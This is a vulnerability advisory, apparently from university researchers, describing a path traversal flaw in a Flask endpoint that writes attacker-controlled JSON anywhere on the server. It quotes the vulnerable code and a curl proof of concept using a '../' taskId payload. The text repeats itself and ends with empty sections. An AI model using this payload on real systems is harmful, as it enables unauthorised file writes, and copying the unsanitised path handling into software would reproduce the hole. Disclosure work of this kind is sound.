This vulnerability is found by Songwu security researcher,Zeyu Luo security researcher, Dr. CAO Yinfeng, Kevin(The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
vulnerability description
The /action-data endpoint accepts a taskId field from a POST request and passes it directly into os.path.join() to construct the file storage path, without performing any path validation.
os.path.join() itself does not sanitize or block .. path segments. When taskId contains ../, the resulting path traverses upward level by level according to the operating system’s path resolution rules, escaping the intended data/ directory boundary and ultimately pointing to an arbitrary location on the server’s filesystem.
The content ultimately written is the full JSON body supplied in the attacker’s POST request, meaning the file contents are fully attacker-controlled.
vulnerability component
action_collect_server.py:10-18
def mkdir_n_define_file_name(data_root_dir, task_name):
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
date_folder = timestamp.split('_')[0]
folderpath = os.path.join(data_root_dir, date_folder, task_name) # ←vulnerability
if not os.path.exists(folderpath):
os.makedirs(folderpath) # ← create any dir
filename = f"summary_event_{timestamp}.json"
filepath = os.path.join(folderpath, filename)
return filepath
@app.route('/action-data', methods=['POST'])
def handle_event():
event_data = request.get_json()
task_id = event_data["taskId"] # ← from user input withou any filter
filepath = mkdir_n_define_file_name("data", task_id)
with open(filepath, "w", encoding='utf-8') as json_file:
json.dump(event_data, json_file, indent=2) # ← cotrol by attacker
POC
curl -X POST http://yourhost:4934/action-data \
-H "Content-Type: application/json" \
-d '{
"taskId": "../../../../../../../../tmp/pwned2",
"anykey": "anyvalue"
}'
result
This vulnerability is found by Songwu security researcher,Zeyu Luo security researcher, Dr. CAO Yinfeng, Kevin(The Hong Kong Polytechnic University / HKCT Institute of Higher Education)
vulnerability description
The /action-data endpoint accepts a taskId field from a POST request and passes it directly into os.path.join() to construct the file storage path, without performing any path validation.
os.path.join() itself does not sanitize or block .. path segments. When taskId contains ../, the resulting path traverses upward level by level according to the operating system’s path resolution rules, escaping the intended data/ directory boundary and ultimately pointing to an arbitrary location on the server’s filesystem.
The content ultimately written is the full JSON body supplied in the attacker’s POST request, meaning the file contents are fully attacker-controlled.
vulnerability component
POC
result